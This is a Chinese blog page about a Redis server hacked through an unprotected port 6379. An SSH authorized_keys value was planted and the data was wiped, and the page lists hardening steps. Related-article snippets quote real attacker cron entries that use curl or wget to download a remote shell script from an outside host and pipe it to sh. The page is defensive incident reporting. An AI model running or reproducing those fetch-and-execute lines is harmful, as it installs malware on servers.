redis被攻击,怎么预防

最新推荐文章于 2023-11-08 17:43:04 发布
最新推荐文章于 2023-11-08 17:43:04 发布
阅读量594 收藏
点赞数
文章标签: 数据库 运维
原文链接:http://www.cnblogs.com/fengyefeiluo/p/5057646.html
版权

今天,自己的redis服务器被黑客攻击了,数据全部被删除

从图中可以看到,在db0中多了一个crackit,他就是罪魁祸首,他的值就是ssh无密码连接时需要的authorized_keys。
我们被攻击,主要是因为没有打开防火墙,而且6379这个端口直接对外暴露,所以遭到了黑客的攻击。
解决办法:
1.打开防火墙,6379端口只对调用的ip暴漏(如何配置见我上一篇博客)
2.为redis添加密码验证
3.以非root用户(即普通用户)启动redis服务
4.建议修改redis端口,不用6379

转载于:https://www.cnblogs.com/fengyefeiluo/p/5057646.html

weixin_33696106
关注
redis受到攻击
2302_77670297的博客
05-25 74
2.持久化储存redis,不以root账户启动。7.检查authorized_keys是否非法。增加redis密码验证(设置复杂密码)5.以非root权限启动redis。6.禁止公网开放redis端口,4.不允许key方式登录。
centos下redis安全相关
weixin_30877755的博客
12-06 87
安装的redis3.0+版本都关闭了protected-mode,因而都遭遇了挖矿病毒的攻击,使得服务器99%的占用率!! 因此我们在使用redis时候,最好更改默认端口,并且使用redis密码登录。 (1)redis没有用户概念,redis只有密码(2)redis默认在工作在保护模式下。不允许远程任何用户登录的(protected-mode) redis.conf设置 ...
redis防止黑客恶意攻击的简单办法
qq_36779138的博客
12-31 1424
1.在redis中放入有用户标识的key,每次用户操作时都会根据用户标识的key去匹配一下,匹配上就能操作,匹配不上就拒绝。 下面的代码是商品秒杀场景,根据用户id和商品id去生成一个标识,然后放入redis缓存中。 @Override public String getMd5(Integer id,Integer userid){ //检验用户的合法性 User user = userMapper.findById(userid); if(user
Redis攻击Redis安全性)
Beyonderwei的博客
10-28 2252
文章目录一、简介二、设置密码 一、简介     默认Redis没有开启密码,因此需要我们进入后设置。如果没有设置密码就很容易会被攻击到,导致数据丢失,被植入其他内容。被攻击后写入了一些其他内容如下: 查询一下某一个键的内容为如下形式:(不是很懂,应该被植入了一些脚本文件) "\t\n*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t" 二、设置密码 常用命令: config get requirepass # 查询获
Redis攻击纪实
最新发布
程序员青菜学厨记
11-08 460
1、2017年时候测试环境安装的是Redis4.0版本(或者更低,记不太清了),默认安装6379端口可以远程访问,然后被黑了,被人家做为挖矿机,他们太狠了,一定要把我CPU耗尽,搞得别的程序都跑不了(这样别人不就发现了吗,不能控制CPU的占用情况吗?上周新来的同事分享Redis的原理和机制,想起2017年的时候测试环境Redis攻击,最后只能重新安装服务器,今天试验一把利用Redis漏洞进行攻击,只有理解了别人是怎么攻击的,才能更好地进行防范。注:忘记截屏了,重启了Redis,那个注入的key找不到了。
redis攻击还原
10-05
文档中提到的Redis攻击还原,涵盖了攻击者如何利用Redis服务发起攻击以及如何进行防御。 首先,文档指出Redis攻击的原理之一在于其默认配置并不安全,特别在未设置密码认证的情况下,任何知道Redis服务所在IP和端口...
redis面试题及其答案.pdf
07-09
Redis是一个高性能的开源内存数据库,广泛应用于各种需要高速读写的场合,如缓存、消息队列处理、数据的临时存储等场景。本内容将详细介绍Redis的主要功能、数据类型、单进程单线程设计、优势、数据淘汰策略以及集群...
redis-6.2.13.tar.gz
09-26
可以通过`rename-command`更改敏感命令名称,防止误操作或攻击。还可以设置密码保护,限制客户端连接。 10. **模块系统**: Redis 6.2.13引入了模块系统,允许扩展其功能,如GEO索引、TTL监控等。 11. **性能...
【愚公系列】2023年05月 Web渗透测试之攻击内网Redis
热门推荐
时光隧道
08-24 5万+
Redis的内网渗透是指攻击者利用漏洞或者弱密码进入Redis服务器所在的内网,然后利用Redis服务本身的漏洞或者弱密码拿到Redis服务器的控制权,并继续向内网内的其他计算机和服务发起攻击。这种攻击方式在内部网络防火墙被绕过的情况下非常有效,因此需要加强Redis本身的安全保护措施,并加强内网安全防范措施。
Redis缓存击穿、穿透、雪崩的原因及解决方案
瘾丶病的博客
08-06 2470
Redis缓存击穿、穿透、雪崩的原因及解决方案 一、缓存击穿 在Redis获取某一key时, 由于key不存在, 而必须向DB发起一次请求的行为, 称为“Redis击穿”。 缓存中没有但数据库中有的数据(一般是缓存时间到期),这时由于并发用户特别多,同时读缓存没读到数据,又同时去数据库去取数据,引起数据库压力瞬间增大,造成过大压力。 引发击穿的原因: 第一次访问 恶意访问不存在的key Key过期 合理的规避方案: 服务器启动时, 提前写入 规范key的命名, 通过中间件拦截 加互斥锁 对某些高频访问的Ke
redis漏洞防攻击
花非花雾非雾物语人生
06-14 1968
预防措施:1. 禁止Redis服务对公网开放,可通过修改redis.conf配置文件中的"#bind 127.0.0.1" ,去掉前面的"#"即可(Redis本来就是作为内存数据库,只要监听在本机即可);2. 设置密码访问认证,可通过修改redis.conf配置文件中的"requirepass" 设置复杂密码 (需要重启Redis服务才能生效);3. 对访问源IP进行访问控制,可在防火墙限定指定源...
redis 安全漏洞导致服务器被攻击
Golden_lion的博客
03-01 3903
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
Redis缓存防止网站cc攻击
敦煌的驼铃_Blog
01-24 1432
Redis缓存防止网站cc攻击 介绍 前面写过一片利用session防止网站cc攻击的博客,这里换另一种方法,利用redis自增 来防止网站cc攻击。 废话不多说,上代码 简单redis操作类 <?php namespace App\model\cache\redis; class redis { private static $RedisObj; priva
redis攻击笔记
半僧
12-31 3528
公司redis集群不断丢失数据,莫名进程不断涌起。经过几天排查,锁定redis攻击。很多使用者都是把redis下载到服务器直接运行使用,无ACL,无密码,root运行,且绑定在0.0.0.0:6379,暴露在公网。攻击者在未授权访问 Redis 的情况下通过redis的机制,可以将自己的公钥或者其他恶意程序写入目标服务器中,从而可以直接控制目标服务器。 下面还原攻击情况:寻找无验证的redis
php使用redis防止cc攻击
大侠等等我
12-01 858
public function filter_cc() { //时间间隔 $TIME_SPAN = 3; //最大请求数 $MAX_REQUEST = 50; //两参数组合起来就是:限制同一IP的客户在多少时间间隔内允许的最大请求数是多少。 $this-&gt;load-&gt;model("tb_...
记一次Redis漏洞导致服务器被入侵以及解决的过程
orisonchan的博客
08-09 2681
其实这个问题在网上都有说明。然而因为本人是开发出身,运维方面比较欠缺,所以才会遇到此问题,遂记录下来,以此为戒。 被入侵现象 服务器多了很多莫名其妙的操作,根据查看操作记录命令history得到。 服务器会莫名其妙重启。 经常ssh免密登录失效。 apt-get使用报错。 报错log如下: insserv: warning: script 'S01w...
Redis 也能被攻击?一次Redis被入侵的记录
探索云原生
12-05 5632
通过 RDB 方式入侵,Redis攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
redis如何预防redis请求问题
07-08
5. 限制请求频率:通过设置请求频率限制,可以防止恶意或异常请求对Redis服务器的过载攻击,例如使用令牌桶算法或漏桶算法等进行限流控制。 6. 合理配置Redis参数:根据实际需求,对Redis的配置参数进行调优,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值